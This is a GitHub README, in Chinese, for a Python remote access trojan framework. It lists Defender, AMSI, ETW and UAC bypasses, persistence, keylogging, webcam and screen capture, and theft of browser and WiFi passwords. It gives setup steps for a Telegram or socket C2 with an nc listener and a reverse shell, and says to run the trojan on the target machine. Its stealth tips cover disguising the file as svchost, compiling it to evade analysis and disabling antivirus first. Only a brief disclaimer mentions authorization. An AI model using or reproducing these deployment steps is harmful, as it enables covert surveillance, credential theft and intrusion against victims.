Adhi-hub07/Nexus-RAT-Framework

GitHub: Adhi-hub07/Nexus-RAT-Framework

一款集成 Telegram C2、加密通信、安全绕过、持久化与监控凭据提取等功能的远控木马框架,面向授权渗透测试与安全研究场景。

Stars: 0 | Forks: 0

# 🛡️ Nexus RAT Framework v2.0 ## 🔥 功能 | 类别 | 能力 | |----------|-------------| | **🔒 加密** | AES-128 Fernet 加密的 C2 通信 | | **🛡️ 安全绕过** | 禁用 Windows Defender、AMSI 绕过、ETW 绕过、UAC 绕过、Defender 排除项、禁用防火墙 | | **🕵️ 反分析** | 反 VM 检测、反调试、沙箱检测、分析时自动终止 | | **📌 持久化** | 启动文件夹、注册表 Run 键、计划任务 | | **⌨️ 键盘记录器** | 捕获击键及对应窗口标题的实时记录 | | **📸 监控** | 屏幕截图、摄像头抓拍、录音 | | **🔑 凭据** | 提取 Chrome 密码、导出 WiFi 密码、窃取剪贴板内容 | | **📁 文件操作** | 列表、读取、写入、上传、下载、删除 | | **⚙️ 进程** | 列出进程、终止进程 | | **🌐 网络** | 端口扫描器、ARP 扫描、网络信息、reverse shell | | **😂 恶作剧** | 屏幕锁定、伪造的 BSOD、消息框 | | **💣 自毁** | 立即清除所有痕迹 | | **📱 Telegram C2** | 通过 Telegram bot 从世界任何地方进行控制 | ## 📁 文件 | 文件 | 描述 | 适用场景 | |------|-------------|----------| | `telegram_rat.py` | **Telegram C2 RAT** | 通过 Telegram 从任何地方进行控制(推荐) | | `advanced_rat.py` | **加密 Socket C2 RAT** | 带有完全加密的直接 socket C2 | | `stealth_rat.py` | **基础隐蔽 RAT** | 轻量级 reverse shell | ## 🚀 快速开始 ### 选项 1:Telegram C2(推荐 — 可在任何地方工作) #### 步骤 1:创建 Telegram Bot 1. 打开 Telegram,搜索 **@BotFather** 2. 发送 `/newbot` 3. 为其命名(例如 `Nexus C2 Bot`) 4. 复制 **bot token**(例如 `123456:ABC-DEF...`) #### 步骤 2:配置 RAT 编辑 `telegram_rat.py` 并替换 token: ``` BOT_TOKEN = "YOUR_TELEGRAM_BOT_TOKEN_HERE" ``` #### 步骤 3:安装依赖 ``` pip install requests pillow opencv-python pynput ``` #### 步骤 4:在目标机器上运行 ``` python3 telegram_rat.py ``` #### 步骤 5:通过 Telegram 控制 1. 在 Telegram 中打开你的 bot 2. 发送 `/start` 3. 你将看到连接信标 4. 发送任何命令 — 结果将直接返回到 Telegram 中 ### 选项 2:直接 Socket C2 #### 步骤 1:配置 编辑 `advanced_rat.py`: ``` C2_HOST = "YOUR_VPS_IP" # Your server IP C2_PORT = 443 # HTTPS port (stealthier) ``` #### 步骤 2:安装依赖 ``` pip install cryptography pillow pyWinhook pynput sounddevice scipy pythoncom wmi ``` #### 步骤 3:启动监听器(在你的 VPS 上) ``` nc -lvnp 443 ``` #### 步骤 4:在目标机器上运行 ``` python3 advanced_rat.py ``` ## 📋 命令参考 ### 🖥️ 系统命令 | 命令 | 描述 | |---------|-------------| | `sysinfo` | 完整的系统信息 | | `whoami` | 当前用户 | | `id` | 用户/组 ID | | `ip` | 本地 IP 地址 | | `admin` | 检查 admin/root 状态 | | `hostname` | 机器主机名 | ### ⚡ Shell 命令 | 命令 | 描述 | |---------|-------------| | `shell ` | 执行任何 shell 命令 | | `cmd ` | 执行 Windows 命令 | | `powershell ` | 执行 PowerShell 命令 | | `ps` | 列出所有正在运行的进程 | | `kill ` | 通过 PID 终止进程 | | `python ` | 执行 Python 表达式 | ### 📁 文件命令 | 命令 | 描述 | |---------|-------------| | `ls [path]` | 列出目录中的文件 | | `cd ` | 更改工作目录 | | `pwd` | 打印当前目录 | | `cat ` | 读取文件内容 | | `write path\|content` | 将内容写入文件 | | `download ` | 下载文件(发送至 Telegram/C2) | | `rm ` | 删除文件 | | `mkdir ` | 创建目录 | ### 🛡️ 安全绕过命令 | 命令 | 描述 | |---------|-------------| | `defender` | 禁用 Windows Defender | | `defender_exclusions` | 为用户目录添加 Defender 排除项 | | `amsi` | 绕过 AMSI (Antimalware Scan Interface) | | `etw` | 绕过 ETW (Event Tracing for Windows) | | `uac` | 通过 fodhelper 方法绕过 UAC | | `disable_firewall` | 禁用 Windows 防火墙 | ### 📌 持久化命令 | 命令 | 描述 | |---------|-------------| | `persist` | 安装持久化(启动文件夹 + 注册表 + 计划任务) | | `unpersist` | 移除所有持久化机制 | ### 📸 监控命令 | 命令 | 描述 | |---------|-------------| | `screenshot` / `ss` | 捕获屏幕(发送图片) | | `webcam` | 捕获摄像头(发送照片) | | `keylog_start` | 启动键盘记录器 | | `keylog_dump` | 导出已捕获的击键记录 | | `keylog_stop` | 停止键盘记录器并清除日志 | ### 🔑 凭据命令 | 命令 | 描述 | |---------|-------------| | `wifi_creds` | 提取所有已保存的 WiFi 密码 | | `chrome_creds` | 提取 Chrome 保存的密码 | | `clipboard` | 获取剪贴板内容 | ### 🌐 网络命令 | 命令 | 描述 | |---------|-------------| | `network` | 显示网络配置 | | `scanports ` | 扫描目标端口 (1-1024) | | `reverse_shell ` | 反向连接到监听器 | ### 😂 恶作剧命令 | 命令 | 描述 | |---------|-------------| | `lock` | 锁定屏幕 | | `msg ` | 显示消息框 | | `bsod` | 触发伪造的 BSOD (Blue Screen of Death) | ### 🔧 实用命令 | 命令 | 描述 | |---------|-------------| | `hash ` | 生成 MD5 + SHA256 哈希 | | `self_destruct` | 删除 RAT 及所有痕迹 | | `help` | 显示完整命令列表 | ## 🌍 Telegram C2 — 从任何地方进行控制 ### 为什么使用 Telegram C2? - ✅ **无需 VPS** — 免费的 C2 通道 - ✅ **全球可用** — 可从任何国家进行控制 - ✅ **已加密** — Telegram E2E 加密 - ✅ **无需端口转发** — 只需要网络连接 - ✅ **支持移动端** — 可以通过手机进行控制 - ✅ **文件传输** — 屏幕截图和摄像头照片直接发送至聊天 - ✅ **隐蔽性** — 看起来像正常的 Telegram 流量 ### 架构图 ``` Target Machine Your Phone/Laptop │ │ │ [Runs telegram_rat.py] │ │ │ │ │ ▼ │ │ Telegram API ◄───────────────── │ │ (api.telegram.org) Commands │ │ │ │ │ ▼ │ │ Results back to chat ──────────►│ ``` ## ⚠️ 隐蔽提示 1. **重命名文件** — 不要使用明显的名称 mv telegram_rat.py svchost.py 2. **使用 PythonW** (Windows) — 无控制台窗口 pythonw telegram_rat.py 3. **编译为 EXE** — 增加分析难度 pip install pyinstaller pyinstaller --onefile --windowed --icon=app.ico telegram_rat.py 4. **使用持久化** — 重启后依然存活 persist 5. **先禁用 Defender** — 在运行之前 defender amsi etw ## 📦 依赖 ### Telegram RAT ``` pip install requests pillow opencv-python pynput ``` ### 高级 Socket RAT ``` pip install cryptography pillow pyWinhook pynput sounddevice scipy pythoncom wmi pyaudio opencv-python python-pptx ``` ## 🧪 测试 此框架专为以下用途设计: - ✅ 授权的渗透测试 - ✅ 红队行动 - ✅ 安全研究 - ✅ CTF 竞赛 - ✅ 教育目的 - ✅ 恶意软件分析研究 ## ⚠️ 免责声明 此工具仅供**教育和授权的安全测试目的**使用。未经明确许可,对你不拥有或未获授权测试的系统使用此工具是违法的。作者不对因使用此工具而造成的任何滥用或损害负责。 **在测试之前,请务必获得适当的授权。** ## 📜 许可证 MIT 许可证 — 可免费用于授权目的。 ## ⭐ 如果你觉得有用,请给这个仓库点个 Star!
标签:C2框架, HTTP工具, 子域名变形, 安全学习资源, 恶意软件, 漏洞挖掘, 网络信息收集, 远控木马, 逆向工具